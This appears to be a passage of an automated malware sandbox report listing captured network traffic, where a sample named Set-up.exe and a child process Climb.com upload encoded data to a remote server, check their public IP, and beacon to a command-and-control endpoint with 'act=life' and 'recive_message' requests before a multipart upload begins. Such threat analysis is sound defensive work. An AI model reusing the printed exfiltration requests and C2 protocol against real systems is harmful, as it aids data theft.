Dec 28, 2024 09:29:47.053750992 CET	4944	OUT	Data Raw: 76 34 55 62 6e 61 4a 30 52 4e 38 6e 5c 2f 4c 58 5c 2f 72 33 39 5c 2f 77 44 50 65 74 50 5a 2b 66 34 66 38 45 32 39 5c 2f 77 44 75 5c 2f 69 48 6c 79 48 72 39 5c 2f 77 44 35 36 66 68 5c 2f 79 39 34 36 63 31 44 35 6e 79 76 76 66 65 5c 2f 5c 2f 41 43 Data Ascii: v4UbnaJ0RN8n\/LX\/r39\/wDPetPZ+f4f8E29\/wDu\/iHlyHr9\/wD56fh\/y946c1D5nyvvfe\/\/ACxkcf6n\/J70EorN5Pl\/9c5P+Ww+v86nxIv9+FP9aI\/N8\/8A0f8ApVe\/\/d\/Eogk\/ec\/8th9ol\/54f8vX4df5fiKZ5eWfyfk\/35fXn\/P+FTfJ5iMnyfu\/+Wn+vit+f\/r\/AE9qhkXzW37I3zGf3cmf
Dec 28, 2024 09:29:47.053788900 CET	2472	OUT	Data Raw: 5a 72 69 65 48 65 45 38 6c 79 6e 44 59 33 44 38 49 59 66 4c 4d 42 37 58 47 34 76 43 35 42 48 67 32 72 52 6a 6c 56 66 4c 49 5a 6a 69 63 77 68 54 78 46 4c 41 55 35 59 43 50 75 52 77 63 36 64 61 74 58 72 34 4b 76 6a 61 6b 73 55 5c 2f 6b 76 77 45 50 Data Ascii: ZrieHeE8lynDY3D8IYfLMB7XG4vC5BHg2rRjlVfLIZjicwhTxFLAU5YCPuRwc6datXr4KvjaksU\/kvwEP2cv2V\/HnwI1d\/ib8D\/j9o3hvwD+1p4Ov5fBfw7\/aq0jTtYh8efss\/GT4c+B9H+JFtr3w3+Dvj7Rn+JHjLxf4V8JXdn8ONR1w6Fp+reIdX1D4keEIdF0\/XdS8r8F6R8UbjX\/APxFX4l\/s3fsQ6H4C\/Zrv
Dec 28, 2024 09:29:47.097618103 CET	27192	OUT	Data Raw: 4d 6c 6f 4d 34 74 58 73 37 64 37 63 5a 41 42 78 41 30 5a 69 47 51 41 44 68 65 51 42 36 55 5a 58 39 43 5c 2f 68 54 41 34 54 4d 61 47 4b 34 6b 7a 54 48 31 63 5a 77 5c 2f 6a 4d 6a 77 39 61 70 68 38 48 53 2b 6f 7a 78 65 55 38 4e 5a 46 39 66 6f 51 6f Data Ascii: MloM4tXs7d7cZABxA0ZiGQADheQB6UZX9C\/hTA4TMaGK4kzTH1cZw\/jMjw9aph8HS+ozxeU8NZF9foQoUKUFiaOU8L4DDU5KEed1sbPEe3+tTiaZx+0C41zHGZbiMHwlk2W0cHxTgOJcXQpYvMav9ovA4\/iHN1gMROviatSWGrZrxHicVUpznUjBYPLqWHVCOFin+aH7QvjPwlpfwc8afAbwh4jPxJ0jwN\/wTK0z9nnwz8T
Dec 28, 2024 09:29:47.217289925 CET	8652	OUT	Data Raw: 38 41 6c 78 6c 34 61 5a 6c 77 52 53 6f 35 7a 34 6e 35 46 6d 6d 54 5a 62 57 6e 68 76 37 4b 77 74 56 78 69 38 37 39 72 52 78 57 4a 61 77 38 38 4c 4b 76 4b 64 4e 77 77 30 49 51 6e 4b 70 67 38 4e 4a 56 33 57 65 4f 5c 2f 63 4c 43 34 72 5c 2f 30 4f 63 Data Ascii: 8Alxl4aZlwRSo5z4n5FmmTZbWnhv7KwtVxi879rRxWJaw88LKvKdNww0IQnKpg8NJV3WeO\/cLC4r\/0Ocw+k5l\/jZi\/9Qvoq8XZJxLxXPLc1xvEOeYnK8ywlHgvBYXH5FlVLHYilxLhcnozSr53VxFb6jhOI8yhLLoYCnw+45nLOcm+t\/8AgoF\/wVt\/YV+Avx1+FPws+Ff7PfxD+NHjL\/gn3f3Xgv4R3vh742ax8Fvgf
Dec 28, 2024 09:29:50.812779903 CET	157	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sat, 28 Dec 2024 08:29:50 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1 Connection: close Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49773	194.87.58.92	80	4352	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 09:29:51.093384981 CET	99	OUT	GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1 Host: home.fortth14ht.top Accept: /
Dec 28, 2024 09:29:52.549942970 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Sat, 28 Dec 2024 08:29:52 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49779	194.87.58.92	80	4352	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 09:29:52.818582058 CET	172	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Dec 28, 2024 09:29:54.462794065 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Sat, 28 Dec 2024 08:29:54 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49719	34.226.108.155	443	4352	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:29:30 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-28 08:29:31 UTC	224	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:29:30 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-28 08:29:31 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49774	172.67.128.184	443	5660	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:29:52 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: spuriotis.click
2024-12-28 08:29:52 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-28 08:29:53 UTC	1122	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:29:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0t514juth1c3ha8poanmt8el0c; expires=Wed, 23 Apr 2025 02:16:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s7sLZeAGEnYG0%2Bgn2abehTelo1v25DEmWQfNPUOaX0DOAsgQ0q9gMZbhQsM0R7C8IxrAsoMMvhNJPfa71GKPqCaqTmOQpbJd%2B1zDq3C1zA6KSdz55GjFOG0chwWO5neh9hU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f902f65fffe447a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=2006&rtt_var=776&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=906&delivery_rate=1388492&cwnd=232&unsent_bytes=0&cid=c77a5d4b63c95da5&ts=1072&x=0"
2024-12-28 08:29:53 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-28 08:29:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49781	172.67.128.184	443	5660	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:29:54 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 45 Host: spuriotis.click
2024-12-28 08:29:54 UTC	45	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 35 46 77 68 56 4d 2d 2d 6c 6c 6c 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=5FwhVM--lll&j=
2024-12-28 08:29:55 UTC	1133	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:29:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0d4tj5j50al3jppf88gec9t4ph; expires=Wed, 23 Apr 2025 02:16:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nZo%2Fc5T8Y4jggbi9HftvuoA9q%2BiXPCVxFJOiKa6z%2BKxpgAPSU%2FVMm7%2BITLKiEOvF0w5%2BEDYkT7tHClp4RqG5t5WCoCtODoBdKbij2ltks%2FJLFynHcMSH0JuRkyd%2BkgUUhfI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f902f742ec24337-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1574&rtt_var=599&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=944&delivery_rate=1811414&cwnd=222&unsent_bytes=0&cid=b6c66a555f2ad11f&ts=778&x=0"
2024-12-28 08:29:55 UTC	236	IN	Data Raw: 31 34 38 33 0d 0a 75 55 6b 48 4c 57 69 52 42 4b 64 4b 6a 4f 56 58 4c 43 74 58 4e 43 41 48 44 35 35 74 51 55 7a 47 71 71 4b 37 6d 38 42 59 42 58 72 43 61 33 45 50 55 71 55 6f 68 54 6e 70 78 32 31 59 57 53 4a 52 44 43 56 75 2b 6b 39 37 4b 71 66 47 30 64 36 33 34 69 35 6f 57 49 4d 76 5a 6b 45 62 39 43 69 46 4c 2f 54 48 62 58 64 51 64 56 46 4f 4a 54 57 38 43 43 73 75 70 38 62 41 32 76 43 76 4b 47 6b 5a 30 53 56 67 52 51 33 79 59 4d 59 6d 34 59 41 79 53 55 6f 39 57 6b 6c 71 5a 2f 4e 50 62 57 36 6a 30 49 43 42 75 59 30 39 63 52 76 30 4b 48 52 47 53 75 77 6f 33 47 6a 70 69 33 55 57 43 54 5a 52 51 6d 74 70 2b 67 59 70 4a 4b 37 4f 77 64 2f 78 73 44 46 6a 45 74 45 72 59 30 51 48 2b 33 54 4c 4c 4f 61 4c 4e 45 Data Ascii: 1483uUkHLWiRBKdKjOVXLCtXNCAHD55tQUzGqqK7m8BYBXrCa3EPUqUohTnpx21YWSJRDCVu+k97KqfG0d634i5oWIMvZkEb9CiFL/THbXdQdVFOJTW8CCsup8bA2vCvKGkZ0SVgRQ3yYMYm4YAySUo9WklqZ/NPbW6j0ICBuY09cRv0KHRGSuwo3Gjpi3UWCTZRQmtp+gYpJK7Owd/xsDFjEtErY0QH+3TLLOaLNE
2024-12-28 08:29:55 UTC	1369	IN	Data Raw: 4e 4b 64 52 67 43 59 6e 57 38 56 32 4e 39 6c 73 76 52 79 4f 79 76 4b 6d 46 59 78 47 56 38 44 77 33 2f 4a 70 31 6f 35 6f 73 37 53 30 6f 36 55 55 4e 6c 66 2f 4d 50 49 43 61 73 7a 4d 72 57 39 71 30 30 62 52 2f 54 49 6d 4a 41 44 66 74 67 79 69 75 75 79 58 56 4a 55 58 55 4f 41 6b 56 39 2f 77 77 33 49 37 57 49 33 35 66 67 34 6a 31 72 57 49 4e 72 59 30 45 4c 2f 6d 62 58 49 4f 57 4d 4d 46 78 43 50 46 74 50 5a 57 44 32 41 43 41 75 6f 38 4c 4b 31 76 4f 6d 4e 32 6f 65 32 79 73 6c 41 55 72 30 66 6f 56 77 72 71 51 77 58 6b 34 35 51 41 42 66 4c 65 4e 42 4f 6d 36 6a 78 49 43 42 75 61 6f 2f 5a 42 76 51 4a 47 5a 48 41 65 46 6d 31 79 37 6a 67 69 64 49 54 44 74 63 51 58 64 6e 38 67 6b 67 4a 36 2f 42 78 64 37 39 34 6e 51 6e 48 38 4e 72 50 51 38 72 2f 6d 33 4a 49 76 6d 48 64 Data Ascii: NKdRgCYnW8V2N9lsvRyOyvKmFYxGV8Dw3/Jp1o5os7S0o6UUNlf/MPICaszMrW9q00bR/TImJADftgyiuuyXVJUXUOAkV9/ww3I7WI35fg4j1rWINrY0EL/mbXIOWMMFxCPFtPZWD2ACAuo8LK1vOmN2oe2yslAUr0foVwrqQwXk45QABfLeNBOm6jxICBuao/ZBvQJGZHAeFm1y7jgidITDtcQXdn8gkgJ6/Bxd794nQnH8NrPQ8r/m3JIvmHd
2024-12-28 08:29:55 UTC	1369	IN	Data Raw: 57 54 6e 64 68 39 67 6b 73 49 36 69 49 6a 70 6e 2b 75 6e 6f 2f 57 50 45 6f 63 55 77 41 73 56 50 47 4a 75 43 41 49 77 35 57 65 30 38 43 59 6d 47 38 56 32 4d 6a 70 63 44 47 79 2f 61 76 4f 57 6b 57 31 43 35 71 52 77 72 7a 61 38 41 73 35 59 77 32 51 30 30 6e 58 45 4a 74 61 50 30 46 4b 57 37 71 69 4d 66 42 75 66 70 36 56 67 2f 51 61 56 42 4d 42 50 31 68 30 32 6a 78 79 53 77 4f 54 6a 6b 57 47 69 56 67 39 41 6f 6d 49 61 58 43 7a 74 7a 7a 72 6a 4a 70 47 38 6b 6b 59 55 38 47 2b 32 7a 49 4a 75 71 50 50 45 56 43 4d 31 5a 44 62 79 32 79 54 79 51 32 35 4a 43 41 37 66 36 75 4e 32 68 61 37 69 68 72 51 51 33 6c 4a 74 70 6d 39 38 63 79 51 67 6c 74 46 6b 35 73 62 66 63 46 4a 79 36 6a 78 63 58 61 2f 71 45 33 59 42 4c 56 4c 47 46 44 41 2f 35 67 78 53 2f 71 67 69 64 4c 51 44 Data Ascii: WTndh9gksI6iIjpn+uno/WPEocUwAsVPGJuCAIw5We08CYmG8V2MjpcDGy/avOWkW1C5qRwrza8As5Yw2Q00nXEJtaP0FKW7qiMfBufp6Vg/QaVBMBP1h02jxySwOTjkWGiVg9AomIaXCztzzrjJpG8kkYU8G+2zIJuqPPEVCM1ZDby2yTyQ25JCA7f6uN2ha7ihrQQ3lJtpm98cyQgltFk5sbfcFJy6jxcXa/qE3YBLVLGFDA/5gxS/qgidLQD
2024-12-28 08:29:55 UTC	1369	IN	Data Raw: 59 2b 70 50 50 47 43 39 69 4d 66 56 75 66 70 36 62 68 48 4a 4a 57 74 47 42 2f 56 75 77 69 62 6a 6a 44 4e 46 54 6a 4a 51 54 32 31 67 2b 51 77 69 4b 71 37 61 77 39 4c 7a 72 7a 41 6e 56 70 73 73 66 51 39 53 73 30 48 4a 41 66 36 63 4a 31 67 4a 4b 68 68 62 4a 57 72 77 54 33 74 75 70 38 66 4a 31 76 47 71 4e 57 67 63 31 53 31 6a 51 67 2f 38 62 4e 63 67 34 49 6f 2b 51 55 49 6e 56 6b 39 68 59 66 67 48 4b 43 54 6b 68 6f 44 65 34 65 4a 69 4a 79 33 57 4a 47 56 4d 48 4c 4e 35 69 7a 47 75 67 44 6b 4f 45 58 56 61 54 47 56 69 38 41 4d 6f 4a 71 58 45 7a 74 37 38 71 7a 4a 76 43 74 6f 76 62 55 34 45 2f 47 66 42 4c 65 75 44 4d 6b 70 50 4f 68 59 4d 4a 57 72 6b 54 33 74 75 69 2b 2f 31 6d 39 69 59 65 6e 68 57 77 6d 74 69 51 30 71 72 4a 73 6b 72 34 6f 38 36 53 45 41 35 58 45 74 Data Ascii: Y+pPPGC9iMfVufp6bhHJJWtGB/VuwibjjDNFTjJQT21g+QwiKq7aw9LzrzAnVpssfQ9Ss0HJAf6cJ1gJKhhbJWrwT3tup8fJ1vGqNWgc1S1jQg/8bNcg4Io+QUInVk9hYfgHKCTkhoDe4eJiJy3WJGVMHLN5izGugDkOEXVaTGVi8AMoJqXEzt78qzJvCtovbU4E/GfBLeuDMkpPOhYMJWrkT3tui+/1m9iYenhWwmtiQ0qrJskr4o86SEA5XEt
2024-12-28 08:29:55 UTC	916	IN	Data Raw: 43 63 74 6f 4d 33 50 32 50 69 6b 4b 47 41 52 79 53 56 6f 51 41 4c 37 62 38 51 73 36 34 6f 7a 51 6b 4d 30 55 55 78 72 5a 62 78 42 59 79 6d 38 69 4a 69 5a 32 4c 49 68 64 51 37 57 43 6d 68 41 53 75 77 6f 33 47 6a 70 69 33 55 57 43 54 78 45 52 6d 68 2f 39 51 67 74 49 61 66 61 77 64 54 79 73 44 31 6f 48 4e 77 6e 59 30 41 4d 38 6d 50 50 4a 4f 6d 43 50 6b 46 46 64 52 67 43 59 6e 57 38 56 32 4d 41 72 39 76 58 32 76 65 70 4c 48 78 59 78 47 56 38 44 77 33 2f 4a 70 31 6f 37 59 77 2b 53 6b 6b 35 56 6b 5a 6f 62 65 34 41 4a 43 6d 74 77 39 4c 54 2f 71 55 78 62 78 50 55 4c 58 64 44 42 4f 46 6a 31 7a 71 75 79 58 56 4a 55 58 55 4f 41 6c 4e 71 37 42 38 67 62 4a 58 65 77 38 2f 79 72 7a 59 6e 42 35 55 79 4a 55 67 47 73 7a 36 46 4c 75 47 4f 4e 6b 46 49 50 46 70 50 59 47 54 35 Data Ascii: CctoM3P2PikKGARySVoQAL7b8Qs64ozQkM0UUxrZbxBYym8iJiZ2LIhdQ7WCmhASuwo3Gjpi3UWCTxERmh/9QgtIafawdTysD1oHNwnY0AM8mPPJOmCPkFFdRgCYnW8V2MAr9vX2vepLHxYxGV8Dw3/Jp1o7Yw+Skk5VkZobe4AJCmtw9LT/qUxbxPULXdDBOFj1zquyXVJUXUOAlNq7B8gbJXew8/yrzYnB5UyJUgGsz6FLuGONkFIPFpPYGT5
2024-12-28 08:29:55 UTC	1369	IN	Data Raw: 33 34 39 39 0d 0a 6a 52 51 37 77 62 38 59 76 35 34 45 2b 54 55 4d 36 55 55 52 68 62 66 63 49 4c 53 69 68 77 38 6d 5a 74 2b 49 39 66 31 69 44 61 30 4e 73 47 4f 46 55 79 79 76 31 78 79 6f 41 55 48 56 52 54 69 55 31 76 41 51 72 49 62 62 4e 79 64 48 39 71 7a 70 6a 45 74 59 73 5a 55 6f 48 39 6d 4c 4c 4c 4f 6d 48 4f 55 46 4f 50 56 6c 47 5a 57 4b 38 51 57 4d 70 76 49 69 59 6d 64 6d 70 4c 45 59 57 30 44 6b 6c 55 45 54 71 4a 73 49 6b 72 74 39 31 51 45 41 30 58 6b 78 70 5a 66 67 64 49 79 57 74 78 38 48 57 2b 61 45 37 62 52 44 4a 4c 57 56 45 41 76 52 75 77 53 62 38 68 6a 6f 4f 42 33 56 52 57 69 55 31 76 44 34 31 4b 61 50 48 67 76 44 2b 75 54 74 74 47 39 41 6e 4a 56 42 45 36 69 62 43 4a 4b 37 66 64 55 4e 46 4f 46 4a 51 61 57 33 38 42 69 51 6b 74 73 66 50 31 50 71 69 Data Ascii: 3499jRQ7wb8Yv54E+TUM6UURhbfcILSihw8mZt+I9f1iDa0NsGOFUyyv1xyoAUHVRTiU1vAQrIbbNydH9qzpjEtYsZUoH9mLLLOmHOUFOPVlGZWK8QWMpvIiYmdmpLEYW0DklUETqJsIkrt91QEA0XkxpZfgdIyWtx8HW+aE7bRDJLWVEAvRuwSb8hjoOB3VRWiU1vD41KaPHgvD+uTttG9AnJVBE6ibCJK7fdUNFOFJQaW38BiQktsfP1Pqi
2024-12-28 08:29:55 UTC	1369	IN	Data Raw: 6b 71 62 30 4d 4c 39 47 48 4f 4f 75 57 56 50 6b 5a 4b 4f 31 35 4c 5a 57 50 38 44 69 34 75 35 49 61 41 33 75 48 69 59 69 63 39 2b 44 78 7a 52 55 6a 51 63 64 4d 69 36 59 73 6a 52 55 67 32 51 45 39 31 4c 62 4a 50 4d 69 6d 31 69 4a 6a 50 36 62 55 39 65 46 62 43 61 32 4a 44 53 71 73 6d 7a 69 66 67 69 6a 35 4b 51 44 42 65 51 57 42 6f 39 67 4d 76 4c 36 7a 42 79 74 7a 38 70 44 42 6b 46 74 51 71 61 55 73 44 2f 57 2b 46 5a 71 36 41 4c 51 34 52 64 57 42 53 59 6e 58 78 48 32 45 63 70 39 6e 52 7a 50 53 79 50 43 55 33 32 43 64 6d 53 67 33 6a 4a 74 70 6d 39 38 63 79 51 67 6c 74 46 6b 4a 68 59 66 38 49 4c 53 47 70 78 38 66 53 39 71 67 30 64 52 66 65 49 32 6c 48 42 2b 46 73 7a 7a 72 6e 6a 6a 68 41 51 53 64 56 41 69 73 74 2b 78 64 6a 64 75 54 36 79 74 72 31 74 44 64 6f 57 Data Ascii: kqb0ML9GHOOuWVPkZKO15LZWP8Di4u5IaA3uHiYic9+DxzRUjQcdMi6YsjRUg2QE91LbJPMim1iJjP6bU9eFbCa2JDSqsmzifgij5KQDBeQWBo9gMvL6zBytz8pDBkFtQqaUsD/W+FZq6ALQ4RdWBSYnXxH2Ecp9nRzPSyPCU32CdmSg3jJtpm98cyQgltFkJhYf8ILSGpx8fS9qg0dRfeI2lHB+FszzrnjjhAQSdVAist+xdjduT6ytr1tDdoW
2024-12-28 08:29:55 UTC	1369	IN	Data Raw: 78 42 50 52 79 77 69 62 6f 68 33 55 41 43 54 6f 57 47 6c 77 74 74 45 38 63 59 4f 54 51 67 49 47 35 6c 7a 6c 70 46 74 77 39 64 41 49 70 35 48 44 50 4d 36 79 68 4d 6c 39 41 49 31 74 51 4a 53 4f 38 43 57 4e 32 39 49 61 41 33 65 6a 69 59 6a 64 4b 67 48 34 32 47 46 71 68 65 59 73 78 72 70 46 31 46 68 74 37 46 6c 41 6c 4e 62 78 49 49 44 79 32 7a 73 50 50 2b 75 55 45 57 54 6a 51 50 57 52 43 41 66 39 59 2b 7a 33 74 69 54 74 4a 58 79 51 57 44 43 56 69 76 46 63 61 62 75 79 49 2f 35 65 35 75 6e 6f 2f 57 4f 34 6f 61 30 45 4e 35 58 65 49 43 4f 57 52 4e 45 4e 43 4f 52 52 44 61 48 33 37 54 32 31 75 6f 6f 69 59 69 62 66 69 50 6e 5a 59 67 33 73 33 46 46 2b 67 4d 5a 56 36 38 63 6b 73 44 6c 39 31 44 68 41 72 4c 65 35 50 65 32 37 6a 79 39 4c 4c 2f 36 45 73 5a 46 2f 6c 46 55 Data Ascii: xBPRywiboh3UACToWGlwttE8cYOTQgIG5lzlpFtw9dAIp5HDPM6yhMl9AI1tQJSO8CWN29IaA3ejiYjdKgH42GFqheYsxrpF1Fht7FlAlNbxIIDy2zsPP+uUEWTjQPWRCAf9Y+z3tiTtJXyQWDCVivFcabuyI/5e5uno/WO4oa0EN5XeICOWRNENCORRDaH37T21uooiYibfiPnZYg3s3FF+gMZV68cksDl91DhArLe5Pe27jy9LL/6EsZF/lFU
2024-12-28 08:29:55 UTC	1369	IN	Data Raw: 50 70 64 6d 72 6f 4d 6b 44 68 46 6c 42 42 6b 77 50 71 74 66 63 54 48 71 30 59 44 50 75 66 70 6f 4b 56 6a 4a 61 7a 30 50 54 66 42 30 31 79 37 74 6b 54 59 4a 64 77 74 77 51 57 4a 72 2f 77 45 30 50 2b 62 6e 77 39 4c 31 72 6a 31 78 4a 75 55 2b 5a 6b 45 45 39 48 44 55 61 4b 44 48 4f 67 34 52 44 42 5a 54 62 32 71 77 52 32 38 2f 74 38 62 4c 7a 2f 37 69 42 53 6c 59 77 32 73 39 44 7a 2f 77 61 4d 73 76 2b 4a 5a 34 61 45 6f 79 55 45 46 72 65 75 31 50 62 57 36 69 69 4a 69 4c 74 2b 49 2b 64 6c 69 44 65 7a 63 55 58 36 41 78 6c 58 72 78 79 53 77 4f 58 33 55 4f 45 53 73 74 37 6b 39 37 62 75 50 47 7a 64 6a 36 72 44 6c 31 43 74 30 6f 63 30 78 4e 7a 56 6a 67 4a 65 4f 43 4f 30 6c 33 43 33 64 49 64 57 44 7a 43 42 30 51 6b 39 6e 48 79 62 75 45 4f 58 45 62 6d 32 55 6c 56 30 71 Data Ascii: PpdmroMkDhFlBBkwPqtfcTHq0YDPufpoKVjJaz0PTfB01y7tkTYJdwtwQWJr/wE0P+bnw9L1rj1xJuU+ZkEE9HDUaKDHOg4RDBZTb2qwR28/t8bLz/7iBSlYw2s9Dz/waMsv+JZ4aEoyUEFreu1PbW6iiJiLt+I+dliDezcUX6AxlXrxySwOX3UOESst7k97buPGzdj6rDl1Ct0oc0xNzVjgJeOCO0l3C3dIdWDzCB0Qk9nHybuEOXEbm2UlV0q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49787	172.67.128.184	443	5660	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:29:57 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4940WYF3RM3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12791 Host: spuriotis.click
